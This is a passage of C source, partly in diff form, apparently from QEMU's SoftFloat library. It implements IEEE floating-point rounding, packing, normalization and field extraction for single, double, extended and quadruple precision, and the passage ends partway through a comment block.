If `zSign' is 1, the input is negated before being converted to an +| integer. Bit 63 of `absZ' must be zero. Ordinarily, the fixed-point input +| is simply rounded to an integer, with the inexact exception raised if the +| input cannot be represented exactly as an integer. However, if the fixed- +| point input is too large, the invalid exception is raised and the largest +| positive or negative integer is returned. +*----------------------------------------------------------------------------*/ + +static int32 roundAndPackInt32( flag zSign, uint64_t absZ STATUS_PARAM) +{ + int8 roundingMode; + flag roundNearestEven; + int8 roundIncrement, roundBits; + int32_t z; + + roundingMode = STATUS(float_rounding_mode); + roundNearestEven = ( roundingMode == float_round_nearest_even ); + switch (roundingMode) { + case float_round_nearest_even: + case float_round_ties_away: + roundIncrement = 0x40; + break; + case float_round_to_zero: + roundIncrement = 0; + break; + case float_round_up: + roundIncrement = zSign ? 0 : 0x7f; + break; + case float_round_down: + roundIncrement = zSign ? 0x7f : 0; + break; + default: + roundIncrement = 0; + float_raise(float_flag_invalid STATUS_VAR); + break; + } + roundBits = absZ & 0x7F; + absZ = ( absZ + roundIncrement )>>7; + absZ &= ~ ( ( ( roundBits ^ 0x40 ) == 0 ) & roundNearestEven ); + z = (int32_t)absZ; + if ( zSign && (z != 0x80000000)) z = - z; + if ( ( absZ>>32 ) || ( z && ( ( z < 0 ) ^ zSign ) ) ) { + float_raise( float_flag_invalid STATUS_VAR); + return zSign ? (int32_t) 0x80000000 : 0x7FFFFFFF; + } + if ( roundBits ) STATUS(float_exception_flags) |= float_flag_inexact; + return z; + +} + +/*---------------------------------------------------------------------------- +| Takes the 128-bit fixed-point value formed by concatenating `absZ0' and +| `absZ1', with binary point between bits 63 and 64 (between the input words), +| and returns the properly rounded 64-bit integer corresponding to the input. 
+| If `zSign' is 1, the input is negated before being converted to an integer. +| Ordinarily, the fixed-point input is simply rounded to an integer, with +| the inexact exception raised if the input cannot be represented exactly as +| an integer. However, if the fixed-point input is too large, the invalid +| exception is raised and the largest positive or negative integer is +| returned. +*----------------------------------------------------------------------------*/ + +static int64 roundAndPackInt64( flag zSign, uint64_t absZ0, uint64_t absZ1 STATUS_PARAM) +{ + int8 roundingMode; + flag roundNearestEven, increment; + int64_t z; + + roundingMode = STATUS(float_rounding_mode); + roundNearestEven = ( roundingMode == float_round_nearest_even ); + switch (roundingMode) { + case float_round_nearest_even: + case float_round_ties_away: + increment = ((int64_t) absZ1 < 0); + break; + case float_round_to_zero: + increment = 0; + break; + case float_round_up: + increment = !zSign && absZ1; + break; + case float_round_down: + increment = zSign && absZ1; + break; + default: + increment = 0; + float_raise(float_flag_invalid STATUS_VAR); + break; + } + if ( increment ) { + ++absZ0; + if ( absZ0 == 0 ) goto overflow; + absZ0 &= ~ ( ( (uint64_t) ( absZ1<<1 ) == 0 ) & roundNearestEven ); + } + z = absZ0; + if ( zSign && z != 0x8000000000000000ULL ) z = - z; + if ( z && ( ( z < 0 ) ^ zSign ) ) { + overflow: + float_raise( float_flag_invalid STATUS_VAR); + return + zSign ? (int64_t) LIT64( 0x8000000000000000 ) + : LIT64( 0x7FFFFFFFFFFFFFFF ); + } + if ( absZ1 ) STATUS(float_exception_flags) |= float_flag_inexact; + return z; + +} + +/*---------------------------------------------------------------------------- +| Takes the 128-bit fixed-point value formed by concatenating `absZ0' and +| `absZ1', with binary point between bits 63 and 64 (between the input words), +| and returns the properly rounded 64-bit unsigned integer corresponding to the +| input. 
Ordinarily, the fixed-point input is simply rounded to an integer, +| with the inexact exception raised if the input cannot be represented exactly +| as an integer. However, if the fixed-point input is too large, the invalid +| exception is raised and the largest unsigned integer is returned. +*----------------------------------------------------------------------------*/ + +static int64 roundAndPackUint64(flag zSign, uint64_t absZ0, + uint64_t absZ1 STATUS_PARAM) +{ + int8 roundingMode; + flag roundNearestEven, increment; + + roundingMode = STATUS(float_rounding_mode); + roundNearestEven = (roundingMode == float_round_nearest_even); + switch (roundingMode) { + case float_round_nearest_even: + case float_round_ties_away: + increment = ((int64_t)absZ1 < 0); + break; + case float_round_to_zero: + increment = 0; + break; + case float_round_up: + increment = !zSign && absZ1; + break; + case float_round_down: + increment = zSign && absZ1; + break; + default: + increment = 0; + float_raise(float_flag_invalid STATUS_VAR); + break; + } + if (increment) { + ++absZ0; + if (absZ0 == 0) { + float_raise(float_flag_invalid STATUS_VAR); + return LIT64(0xFFFFFFFFFFFFFFFF); + } + absZ0 &= ~(((uint64_t)(absZ1<<1) == 0) & roundNearestEven); + } + + if (zSign && absZ0) { + float_raise(float_flag_invalid STATUS_VAR); + return 0; + } + + if (absZ1) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + return absZ0; +} + +/*---------------------------------------------------------------------------- +| Returns the fraction bits of the single-precision floating-point value `a'. +*----------------------------------------------------------------------------*/ + +static inline uint32_t extractFloat32Frac( float32 a ) +{ + + return float32_val(a) & 0x007FFFFF; + +} + +/*---------------------------------------------------------------------------- +| Returns the exponent bits of the single-precision floating-point value `a'. 
+*----------------------------------------------------------------------------*/ + +static inline int_fast16_t extractFloat32Exp(float32 a) +{ + + return ( float32_val(a)>>23 ) & 0xFF; + +} + +/*---------------------------------------------------------------------------- +| Returns the sign bit of the single-precision floating-point value `a'. +*----------------------------------------------------------------------------*/ + +static inline flag extractFloat32Sign( float32 a ) +{ + + return float32_val(a)>>31; + +} + +/*---------------------------------------------------------------------------- +| If `a' is denormal and we are in flush-to-zero mode then set the +| input-denormal exception and return zero. Otherwise just return the value. +*----------------------------------------------------------------------------*/ +float32 float32_squash_input_denormal(float32 a STATUS_PARAM) +{ + if (STATUS(flush_inputs_to_zero)) { + if (extractFloat32Exp(a) == 0 && extractFloat32Frac(a) != 0) { + float_raise(float_flag_input_denormal STATUS_VAR); + return make_float32(float32_val(a) & 0x80000000); + } + } + return a; +} + +/*---------------------------------------------------------------------------- +| Normalizes the subnormal single-precision floating-point value represented +| by the denormalized significand `aSig'. The normalized exponent and +| significand are stored at the locations pointed to by `zExpPtr' and +| `zSigPtr', respectively. +*----------------------------------------------------------------------------*/ + +static void + normalizeFloat32Subnormal(uint32_t aSig, int_fast16_t *zExpPtr, uint32_t *zSigPtr) +{ + int8 shiftCount; + + shiftCount = countLeadingZeros32( aSig ) - 8; + *zSigPtr = aSig<<shiftCount; + *zExpPtr = 1 - shiftCount; + +} + +/*---------------------------------------------------------------------------- +| Packs the sign `zSign', exponent `zExp', and significand `zSig' into a +| single-precision floating-point value, returning the result. 
After being +| shifted into the proper positions, the three fields are simply added +| together to form the result. This means that any integer portion of `zSig' +| will be added into the exponent. Since a properly normalized significand +| will have an integer portion equal to 1, the `zExp' input should be 1 less +| than the desired result exponent whenever `zSig' is a complete, normalized +| significand. +*----------------------------------------------------------------------------*/ + +static inline float32 packFloat32(flag zSign, int_fast16_t zExp, uint32_t zSig) +{ + + return make_float32( + ( ( (uint32_t) zSign )<<31 ) + ( ( (uint32_t) zExp )<<23 ) + zSig); + +} + +/*---------------------------------------------------------------------------- +| Takes an abstract floating-point value having sign `zSign', exponent `zExp', +| and significand `zSig', and returns the proper single-precision floating- +| point value corresponding to the abstract input. Ordinarily, the abstract +| value is simply rounded and packed into the single-precision format, with +| the inexact exception raised if the abstract input cannot be represented +| exactly. However, if the abstract value is too large, the overflow and +| inexact exceptions are raised and an infinity or maximal finite value is +| returned. If the abstract value is too small, the input value is rounded to +| a subnormal number, and the underflow and inexact exceptions are raised if +| the abstract input cannot be represented exactly as a subnormal single- +| precision floating-point number. +| The input significand `zSig' has its binary point between bits 30 +| and 29, which is 7 bits to the left of the usual location. This shifted +| significand must be normalized or smaller. If `zSig' is not normalized, +| `zExp' must be 0; in that case, the result returned is a subnormal number, +| and it must not require rounding. 
 In the usual case that `zSig' is
| normalized, `zExp' must be 1 less than the ``true'' floating-point exponent.
| The handling of underflow and overflow follows the IEC/IEEE Standard for
| Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

static float32 roundAndPackFloat32(flag zSign, int_fast16_t zExp, uint32_t zSig STATUS_PARAM)
{
    int8 roundingMode;
    flag roundNearestEven;
    int8 roundIncrement = 0, roundBits;
    flag isTiny;

    roundingMode = STATUS(float_rounding_mode);
    roundNearestEven = ( roundingMode == float_round_nearest_even );
    /* 0x40 is half an ulp of the 7 guard bits kept below the result;
       0x7f rounds directed modes all the way up to the next value. */
    switch (roundingMode) {
    case float_round_nearest_even:
    case float_round_ties_away:
        roundIncrement = 0x40;
        break;
    case float_round_to_zero:
        roundIncrement = 0;
        break;
    case float_round_up:
        roundIncrement = zSign ? 0 : 0x7f;
        break;
    case float_round_down:
        roundIncrement = zSign ? 0x7f : 0;
        break;
    default:
        float_raise(float_flag_invalid STATUS_VAR);
        break;
    }
    roundBits = zSig & 0x7F;
    /* The unsigned compare catches both zExp too large (overflow) and
       negative zExp (underflow towards a subnormal). */
    if ( 0xFD <= (uint16_t) zExp ) {
        if (    ( 0xFD < zExp )
             || (    ( zExp == 0xFD )
                  && ( (int32_t) ( zSig + roundIncrement ) < 0 ) )
           ) {
            float_raise( float_flag_overflow | float_flag_inexact STATUS_VAR);
            /* Infinity, or the largest finite value when the rounding mode
               never rounds away (roundIncrement == 0). */
            return packFloat32( zSign, 0xFF, - ( roundIncrement == 0 ));
        }
        if ( zExp < 0 ) {
            if (STATUS(flush_to_zero)) {
                float_raise(float_flag_output_denormal STATUS_VAR);
                return packFloat32(zSign, 0, 0);
            }
            isTiny =
                   ( STATUS(float_detect_tininess) == float_tininess_before_rounding )
                || ( zExp < -1 )
                || ( zSig + roundIncrement < 0x80000000 );
            shift32RightJamming( zSig, - zExp, &zSig );
            zExp = 0;
            roundBits = zSig & 0x7F;
            if ( isTiny && roundBits ) float_raise( float_flag_underflow STATUS_VAR);
        }
    }
    if ( roundBits ) STATUS(float_exception_flags) |= float_flag_inexact;
    zSig = ( zSig + roundIncrement )>>7;
    /* On an exact tie, clear the LSB so the result is even. */
    zSig &= ~ ( ( ( roundBits ^ 0x40 ) == 0 ) & roundNearestEven );
    if ( zSig == 0 ) zExp = 0;
    return packFloat32( zSign, zExp, zSig );

}

/*----------------------------------------------------------------------------
| Takes an abstract floating-point value having sign `zSign', exponent `zExp',
| and significand `zSig', and returns the proper single-precision floating-
| point value corresponding to the abstract input.  This routine is just like
| `roundAndPackFloat32' except that `zSig' does not have to be normalized.
| Bit 31 of `zSig' must be zero, and `zExp' must be 1 less than the ``true''
| floating-point exponent.
*----------------------------------------------------------------------------*/

static float32
 normalizeRoundAndPackFloat32(flag zSign, int_fast16_t zExp, uint32_t zSig STATUS_PARAM)
{
    int8 shiftCount;

    /* Leave one spare bit at the top for rounding's possible carry-out. */
    shiftCount = countLeadingZeros32( zSig ) - 1;
    return roundAndPackFloat32( zSign, zExp - shiftCount, zSig<<shiftCount STATUS_VAR);

}

/*----------------------------------------------------------------------------
| Returns the fraction bits of the double-precision floating-point value `a'.
*----------------------------------------------------------------------------*/

static inline uint64_t extractFloat64Frac( float64 a )
{
    /* Fraction field is the low 52 bits. */
    return float64_val(a) & LIT64( 0x000FFFFFFFFFFFFF );

}

/*----------------------------------------------------------------------------
| Returns the exponent bits of the double-precision floating-point value `a'.
*----------------------------------------------------------------------------*/

static inline int_fast16_t extractFloat64Exp(float64 a)
{
    /* Exponent field occupies bits 62..52. */
    return ( float64_val(a)>>52 ) & 0x7FF;

}

/*----------------------------------------------------------------------------
| Returns the sign bit of the double-precision floating-point value `a'.
*----------------------------------------------------------------------------*/

static inline flag extractFloat64Sign( float64 a )
{
    /* Sign is the top bit (bit 63). */
    return float64_val(a)>>63;

}

/*----------------------------------------------------------------------------
| If `a' is denormal and we are in flush-to-zero mode then set the
| input-denormal exception and return zero. Otherwise just return the value.
*----------------------------------------------------------------------------*/
float64 float64_squash_input_denormal(float64 a STATUS_PARAM)
{
    if (STATUS(flush_inputs_to_zero)) {
        /* Exponent 0 with a non-zero fraction is a denormal input. */
        if (extractFloat64Exp(a) == 0 && extractFloat64Frac(a) != 0) {
            float_raise(float_flag_input_denormal STATUS_VAR);
            /* Keep only the sign bit, i.e. return a signed zero. */
            return make_float64(float64_val(a) & (1ULL << 63));
        }
    }
    return a;
}

/*----------------------------------------------------------------------------
| Normalizes the subnormal double-precision floating-point value represented
| by the denormalized significand `aSig'.  The normalized exponent and
| significand are stored at the locations pointed to by `zExpPtr' and
| `zSigPtr', respectively.
*----------------------------------------------------------------------------*/

static void
 normalizeFloat64Subnormal(uint64_t aSig, int_fast16_t *zExpPtr, uint64_t *zSigPtr)
{
    int8 shiftCount;

    /* 11 = 63 - 52: shift so the leading 1 lands just above the fraction. */
    shiftCount = countLeadingZeros64( aSig ) - 11;
    *zSigPtr = aSig<<shiftCount;
    *zExpPtr = 1 - shiftCount;

}

/*----------------------------------------------------------------------------
| Packs the sign `zSign', exponent `zExp', and significand `zSig' into a
| double-precision floating-point value, returning the result.  After being
| shifted into the proper positions, the three fields are simply added
| together to form the result.  This means that any integer portion of `zSig'
| will be added into the exponent.
 Since a properly normalized significand
| will have an integer portion equal to 1, the `zExp' input should be 1 less
| than the desired result exponent whenever `zSig' is a complete, normalized
| significand.
*----------------------------------------------------------------------------*/

static inline float64 packFloat64(flag zSign, int_fast16_t zExp, uint64_t zSig)
{
    /* Fields are combined with '+' so a carry out of zSig propagates into
       the exponent (see the comment above). */
    return make_float64(
          ( ( (uint64_t) zSign )<<63 ) + ( ( (uint64_t) zExp )<<52 ) + zSig);

}

/*----------------------------------------------------------------------------
| Takes an abstract floating-point value having sign `zSign', exponent `zExp',
| and significand `zSig', and returns the proper double-precision floating-
| point value corresponding to the abstract input.  Ordinarily, the abstract
| value is simply rounded and packed into the double-precision format, with
| the inexact exception raised if the abstract input cannot be represented
| exactly.  However, if the abstract value is too large, the overflow and
| inexact exceptions are raised and an infinity or maximal finite value is
| returned.  If the abstract value is too small, the input value is rounded
| to a subnormal number, and the underflow and inexact exceptions are raised
| if the abstract input cannot be represented exactly as a subnormal double-
| precision floating-point number.
|     The input significand `zSig' has its binary point between bits 62
| and 61, which is 10 bits to the left of the usual location.  This shifted
| significand must be normalized or smaller.  If `zSig' is not normalized,
| `zExp' must be 0; in that case, the result returned is a subnormal number,
| and it must not require rounding.  In the usual case that `zSig' is
| normalized, `zExp' must be 1 less than the ``true'' floating-point exponent.
| The handling of underflow and overflow follows the IEC/IEEE Standard for
| Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

static float64 roundAndPackFloat64(flag zSign, int_fast16_t zExp, uint64_t zSig STATUS_PARAM)
{
    int8 roundingMode;
    flag roundNearestEven;
    int_fast16_t roundIncrement = 0, roundBits;
    flag isTiny;

    roundingMode = STATUS(float_rounding_mode);
    roundNearestEven = ( roundingMode == float_round_nearest_even );
    /* 0x200 is half an ulp of the 10 guard bits kept below the result;
       0x3ff rounds directed modes all the way up to the next value. */
    switch (roundingMode) {
    case float_round_nearest_even:
    case float_round_ties_away:
        roundIncrement = 0x200;
        break;
    case float_round_to_zero:
        roundIncrement = 0;
        break;
    case float_round_up:
        roundIncrement = zSign ? 0 : 0x3ff;
        break;
    case float_round_down:
        roundIncrement = zSign ? 0x3ff : 0;
        break;
    default:
        float_raise(float_flag_invalid STATUS_VAR);
        break;
    }
    roundBits = zSig & 0x3FF;
    /* The unsigned compare catches both zExp too large (overflow) and
       negative zExp (underflow towards a subnormal). */
    if ( 0x7FD <= (uint16_t) zExp ) {
        if (    ( 0x7FD < zExp )
             || (    ( zExp == 0x7FD )
                  && ( (int64_t) ( zSig + roundIncrement ) < 0 ) )
           ) {
            float_raise( float_flag_overflow | float_flag_inexact STATUS_VAR);
            /* Infinity, or the largest finite value when the rounding mode
               never rounds away (roundIncrement == 0). */
            return packFloat64( zSign, 0x7FF, - ( roundIncrement == 0 ));
        }
        if ( zExp < 0 ) {
            if (STATUS(flush_to_zero)) {
                float_raise(float_flag_output_denormal STATUS_VAR);
                return packFloat64(zSign, 0, 0);
            }
            isTiny =
                   ( STATUS(float_detect_tininess) == float_tininess_before_rounding )
                || ( zExp < -1 )
                || ( zSig + roundIncrement < LIT64( 0x8000000000000000 ) );
            shift64RightJamming( zSig, - zExp, &zSig );
            zExp = 0;
            roundBits = zSig & 0x3FF;
            if ( isTiny && roundBits ) float_raise( float_flag_underflow STATUS_VAR);
        }
    }
    if ( roundBits ) STATUS(float_exception_flags) |= float_flag_inexact;
    zSig = ( zSig + roundIncrement )>>10;
    /* On an exact tie, clear the LSB so the result is even. */
    zSig &= ~ ( ( ( roundBits ^ 0x200 ) == 0 ) & roundNearestEven );
    if ( zSig == 0 ) zExp = 0;
    return packFloat64( zSign, zExp, zSig );

}

/*----------------------------------------------------------------------------
| Takes an abstract floating-point value having sign `zSign', exponent `zExp',
| and significand `zSig', and returns the proper double-precision floating-
| point value corresponding to the abstract input.  This routine is just like
| `roundAndPackFloat64' except that `zSig' does not have to be normalized.
| Bit 63 of `zSig' must be zero, and `zExp' must be 1 less than the ``true''
| floating-point exponent.
*----------------------------------------------------------------------------*/

static float64
 normalizeRoundAndPackFloat64(flag zSign, int_fast16_t zExp, uint64_t zSig STATUS_PARAM)
{
    int8 shiftCount;

    /* Leave one spare bit at the top for rounding's possible carry-out. */
    shiftCount = countLeadingZeros64( zSig ) - 1;
    return roundAndPackFloat64( zSign, zExp - shiftCount, zSig<<shiftCount STATUS_VAR);

}

/*----------------------------------------------------------------------------
| Returns the fraction bits of the extended double-precision floating-point
| value `a'.
*----------------------------------------------------------------------------*/

static inline uint64_t extractFloatx80Frac( floatx80 a )
{
    /* The x80 significand occupies the whole 64-bit `low' field. */
    return a.low;

}

/*----------------------------------------------------------------------------
| Returns the exponent bits of the extended double-precision floating-point
| value `a'.
*----------------------------------------------------------------------------*/

static inline int32 extractFloatx80Exp( floatx80 a )
{
    /* Exponent is the low 15 bits of `high'. */
    return a.high & 0x7FFF;

}

/*----------------------------------------------------------------------------
| Returns the sign bit of the extended double-precision floating-point value
| `a'.
*----------------------------------------------------------------------------*/

static inline flag extractFloatx80Sign( floatx80 a )
{
    /* Sign is bit 15 of `high'. */
    return a.high>>15;

}

/*----------------------------------------------------------------------------
| Normalizes the subnormal extended double-precision floating-point value
| represented by the denormalized significand `aSig'.
 The normalized exponent
| and significand are stored at the locations pointed to by `zExpPtr' and
| `zSigPtr', respectively.
*----------------------------------------------------------------------------*/

static void
 normalizeFloatx80Subnormal( uint64_t aSig, int32 *zExpPtr, uint64_t *zSigPtr )
{
    int8 shiftCount;

    /* The `& 0x3f' clamps the shift into [0,63] — presumably so that
       aSig == 0 does not produce an undefined 64-bit shift; confirm
       countLeadingZeros64(0) == 64 against its definition. */
    shiftCount = countLeadingZeros64( aSig ) & 0x3f;
    *zSigPtr = aSig<<shiftCount;
    *zExpPtr = 1 - shiftCount;

}

/*----------------------------------------------------------------------------
| Packs the sign `zSign', exponent `zExp', and significand `zSig' into an
| extended double-precision floating-point value, returning the result.
*----------------------------------------------------------------------------*/

static inline floatx80 packFloatx80( flag zSign, int32 zExp, uint64_t zSig )
{
    floatx80 z;

    z.low = zSig;
    z.high = ( ( (uint16_t) zSign )<<15 ) + zExp;
    return z;

}

/*----------------------------------------------------------------------------
| Takes an abstract floating-point value having sign `zSign', exponent `zExp',
| and extended significand formed by the concatenation of `zSig0' and `zSig1',
| and returns the proper extended double-precision floating-point value
| corresponding to the abstract input.  Ordinarily, the abstract value is
| rounded and packed into the extended double-precision format, with the
| inexact exception raised if the abstract input cannot be represented
| exactly.  However, if the abstract value is too large, the overflow and
| inexact exceptions are raised and an infinity or maximal finite value is
| returned.  If the abstract value is too small, the input value is rounded to
| a subnormal number, and the underflow and inexact exceptions are raised if
| the abstract input cannot be represented exactly as a subnormal extended
| double-precision floating-point number.
|     If `roundingPrecision' is 32 or 64, the result is rounded to the same
| number of bits as single or double precision, respectively.  Otherwise, the
| result is rounded to the full precision of the extended double-precision
| format.
|     The input significand must be normalized or smaller.  If the input
| significand is not normalized, `zExp' must be 0; in that case, the result
| returned is a subnormal number, and it must not require rounding.  The
| handling of underflow and overflow follows the IEC/IEEE Standard for Binary
| Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

static floatx80
 roundAndPackFloatx80(
     int8 roundingPrecision, flag zSign, int32 zExp, uint64_t zSig0, uint64_t zSig1
 STATUS_PARAM)
{
    int8 roundingMode;
    flag roundNearestEven, increment = 0, isTiny;
    int64 roundIncrement, roundMask, roundBits;

    roundingMode = STATUS(float_rounding_mode);
    roundNearestEven = ( roundingMode == float_round_nearest_even );
    if ( roundingPrecision == 80 ) goto precision80;
    /* Reduced-precision paths keep the result in zSig0 only and round at
       the single/double significand boundary via roundMask. */
    if ( roundingPrecision == 64 ) {
        roundIncrement = LIT64( 0x0000000000000400 );
        roundMask = LIT64( 0x00000000000007FF );
    }
    else if ( roundingPrecision == 32 ) {
        roundIncrement = LIT64( 0x0000008000000000 );
        roundMask = LIT64( 0x000000FFFFFFFFFF );
    }
    else {
        goto precision80;
    }
    /* Fold the low word into the sticky bit of the high word. */
    zSig0 |= ( zSig1 != 0 );
    switch (roundingMode) {
    case float_round_nearest_even:
    case float_round_ties_away:
        break;
    case float_round_to_zero:
        roundIncrement = 0;
        break;
    case float_round_up:
        roundIncrement = zSign ? 0 : roundMask;
        break;
    case float_round_down:
        roundIncrement = zSign ? roundMask : 0;
        break;
    default:
        float_raise(float_flag_invalid STATUS_VAR);
        break;
    }
    roundBits = zSig0 & roundMask;
    /* Unsigned compare on zExp-1 catches zExp <= 0 and zExp >= 0x7FFE. */
    if ( 0x7FFD <= (uint32_t) ( zExp - 1 ) ) {
        if (    ( 0x7FFE < zExp )
             || ( ( zExp == 0x7FFE ) && ( zSig0 + roundIncrement < zSig0 ) )
           ) {
            goto overflow;
        }
        if ( zExp <= 0 ) {
            if (STATUS(flush_to_zero)) {
                float_raise(float_flag_output_denormal STATUS_VAR);
                return packFloatx80(zSign, 0, 0);
            }
            isTiny =
                   ( STATUS(float_detect_tininess) == float_tininess_before_rounding )
                || ( zExp < 0 )
                || ( zSig0 <= zSig0 + roundIncrement );
            shift64RightJamming( zSig0, 1 - zExp, &zSig0 );
            zExp = 0;
            roundBits = zSig0 & roundMask;
            if ( isTiny && roundBits ) float_raise( float_flag_underflow STATUS_VAR);
            if ( roundBits ) STATUS(float_exception_flags) |= float_flag_inexact;
            zSig0 += roundIncrement;
            if ( (int64_t) zSig0 < 0 ) zExp = 1;
            roundIncrement = roundMask + 1;
            /* Ties-to-even: widen the mask to also clear the result LSB. */
            if ( roundNearestEven && ( roundBits<<1 == roundIncrement ) ) {
                roundMask |= roundIncrement;
            }
            zSig0 &= ~ roundMask;
            return packFloatx80( zSign, zExp, zSig0 );
        }
    }
    if ( roundBits ) STATUS(float_exception_flags) |= float_flag_inexact;
    zSig0 += roundIncrement;
    if ( zSig0 < (uint64_t)roundIncrement ) {
        /* Carry out of the significand: renormalize to 1.0 * 2^(zExp+1). */
        ++zExp;
        zSig0 = LIT64( 0x8000000000000000 );
    }
    roundIncrement = roundMask + 1;
    if ( roundNearestEven && ( roundBits<<1 == roundIncrement ) ) {
        roundMask |= roundIncrement;
    }
    zSig0 &= ~ roundMask;
    if ( zSig0 == 0 ) zExp = 0;
    return packFloatx80( zSign, zExp, zSig0 );
 precision80:
    /* Full 80-bit precision: zSig1 holds the round/sticky bits. */
    switch (roundingMode) {
    case float_round_nearest_even:
    case float_round_ties_away:
        increment = ((int64_t)zSig1 < 0);
        break;
    case float_round_to_zero:
        increment = 0;
        break;
    case float_round_up:
        increment = !zSign && zSig1;
        break;
    case float_round_down:
        increment = zSign && zSig1;
        break;
    default:
        float_raise(float_flag_invalid STATUS_VAR);
        break;
    }
    if ( 0x7FFD <= (uint32_t) ( zExp - 1 ) ) {
        if (    ( 0x7FFE < zExp )
             || (    ( zExp == 0x7FFE )
                  && ( zSig0 == LIT64( 0xFFFFFFFFFFFFFFFF ) )
                  && increment
                )
           ) {
            roundMask = 0;
 overflow:
            float_raise( float_flag_overflow | float_flag_inexact STATUS_VAR);
            if (    ( roundingMode == float_round_to_zero )
                 || ( zSign && ( roundingMode == float_round_up ) )
                 || ( ! zSign && ( roundingMode == float_round_down ) )
               ) {
                /* Rounding away from infinity: largest finite value. */
                return packFloatx80( zSign, 0x7FFE, ~ roundMask );
            }
            return packFloatx80( zSign, 0x7FFF, LIT64( 0x8000000000000000 ) );
        }
        if ( zExp <= 0 ) {
            isTiny =
                   ( STATUS(float_detect_tininess) == float_tininess_before_rounding )
                || ( zExp < 0 )
                || ! increment
                || ( zSig0 < LIT64( 0xFFFFFFFFFFFFFFFF ) );
            shift64ExtraRightJamming( zSig0, zSig1, 1 - zExp, &zSig0, &zSig1 );
            zExp = 0;
            if ( isTiny && zSig1 ) float_raise( float_flag_underflow STATUS_VAR);
            if ( zSig1 ) STATUS(float_exception_flags) |= float_flag_inexact;
            /* Recompute the rounding decision on the shifted significand. */
            switch (roundingMode) {
            case float_round_nearest_even:
            case float_round_ties_away:
                increment = ((int64_t)zSig1 < 0);
                break;
            case float_round_to_zero:
                increment = 0;
                break;
            case float_round_up:
                increment = !zSign && zSig1;
                break;
            case float_round_down:
                increment = zSign && zSig1;
                break;
            default:
                float_raise(float_flag_invalid STATUS_VAR);
                break;
            }
            if ( increment ) {
                ++zSig0;
                /* On an exact tie, clear the LSB so the result is even. */
                zSig0 &=
                    ~ ( ( (uint64_t) ( zSig1<<1 ) == 0 ) & roundNearestEven );
                if ( (int64_t) zSig0 < 0 ) zExp = 1;
            }
            return packFloatx80( zSign, zExp, zSig0 );
        }
    }
    if ( zSig1 ) STATUS(float_exception_flags) |= float_flag_inexact;
    if ( increment ) {
        ++zSig0;
        if ( zSig0 == 0 ) {
            /* Carry out of the significand: renormalize. */
            ++zExp;
            zSig0 = LIT64( 0x8000000000000000 );
        }
        else {
            zSig0 &= ~ ( ( (uint64_t) ( zSig1<<1 ) == 0 ) & roundNearestEven );
        }
    }
    else {
        if ( zSig0 == 0 ) zExp = 0;
    }
    return packFloatx80( zSign, zExp, zSig0 );

}

/*----------------------------------------------------------------------------
| Takes an abstract floating-point value having sign `zSign', exponent
| `zExp', and
 significand formed by the concatenation of `zSig0' and `zSig1',
| and returns the proper extended double-precision floating-point value
| corresponding to the abstract input.  This routine is just like
| `roundAndPackFloatx80' except that the input significand does not have to be
| normalized.
*----------------------------------------------------------------------------*/

static floatx80
 normalizeRoundAndPackFloatx80(
     int8 roundingPrecision, flag zSign, int32 zExp, uint64_t zSig0, uint64_t zSig1
 STATUS_PARAM)
{
    int8 shiftCount;

    if ( zSig0 == 0 ) {
        /* High word empty: promote the low word, adjust the exponent. */
        zSig0 = zSig1;
        zSig1 = 0;
        zExp -= 64;
    }
    shiftCount = countLeadingZeros64( zSig0 );
    shortShift128Left( zSig0, zSig1, shiftCount, &zSig0, &zSig1 );
    zExp -= shiftCount;
    return
        roundAndPackFloatx80( roundingPrecision, zSign, zExp, zSig0, zSig1 STATUS_VAR);

}

/*----------------------------------------------------------------------------
| Returns the least-significant 64 fraction bits of the quadruple-precision
| floating-point value `a'.
*----------------------------------------------------------------------------*/

static inline uint64_t extractFloat128Frac1( float128 a )
{

    return a.low;

}

/*----------------------------------------------------------------------------
| Returns the most-significant 48 fraction bits of the quadruple-precision
| floating-point value `a'.
*----------------------------------------------------------------------------*/

static inline uint64_t extractFloat128Frac0( float128 a )
{

    return a.high & LIT64( 0x0000FFFFFFFFFFFF );

}

/*----------------------------------------------------------------------------
| Returns the exponent bits of the quadruple-precision floating-point value
| `a'.
*----------------------------------------------------------------------------*/

static inline int32 extractFloat128Exp( float128 a )
{
    /* Exponent field occupies bits 62..48 of the high word. */
    return ( a.high>>48 ) & 0x7FFF;

}

/*----------------------------------------------------------------------------
| Returns the sign bit of the quadruple-precision floating-point value `a'.
*----------------------------------------------------------------------------*/

static inline flag extractFloat128Sign( float128 a )
{
    /* Sign is the top bit of the high word. */
    return a.high>>63;

}

/*----------------------------------------------------------------------------
| Normalizes the subnormal quadruple-precision floating-point value
| represented by the denormalized significand formed by the concatenation of
| `aSig0' and `aSig1'.  The normalized exponent is stored at the location
| pointed to by `zExpPtr'.  The most significant 49 bits of the normalized
| significand are stored at the location pointed to by `zSig0Ptr', and the
| least significant 64 bits of the normalized significand are stored at the
| location pointed to by `zSig1Ptr'.
*----------------------------------------------------------------------------*/

static void
 normalizeFloat128Subnormal(
     uint64_t aSig0,
     uint64_t aSig1,
     int32 *zExpPtr,
     uint64_t *zSig0Ptr,
     uint64_t *zSig1Ptr
 )
{
    int8 shiftCount;

    if ( aSig0 == 0 ) {
        /* 15 = 63 - 48: align the leading 1 just above the 48 fraction
           bits of the high word. */
        shiftCount = countLeadingZeros64( aSig1 ) - 15;
        if ( shiftCount < 0 ) {
            /* Leading 1 is within the top 15 bits of aSig1: split the
               significand across both output words. */
            *zSig0Ptr = aSig1>>( - shiftCount );
            *zSig1Ptr = aSig1<<( shiftCount & 63 );
        }
        else {
            *zSig0Ptr = aSig1<<shiftCount;
            *zSig1Ptr = 0;
        }
        *zExpPtr = - shiftCount - 63;
    }
    else {
        shiftCount = countLeadingZeros64( aSig0 ) - 15;
        shortShift128Left( aSig0, aSig1, shiftCount, zSig0Ptr, zSig1Ptr );
        *zExpPtr = 1 - shiftCount;
    }

}

/*----------------------------------------------------------------------------
| Packs the sign `zSign', the exponent `zExp', and the significand formed
| by the concatenation of `zSig0' and `zSig1' into a quadruple-precision
| floating-point value, returning the result.  After being shifted into the
| proper positions, the three fields `zSign', `zExp', and `zSig0' are simply
| added together to form the most significant 32 bits of the result.  This
| means that any integer portion of `zSig0' will be added into the exponent.
| Since a properly normalized significand will have an integer portion equal
| to 1, the `zExp' input should be 1 less than the desired result exponent
| whenever `zSig0' and `zSig1' concatenated form a complete, normalized
| significand.
*----------------------------------------------------------------------------*/

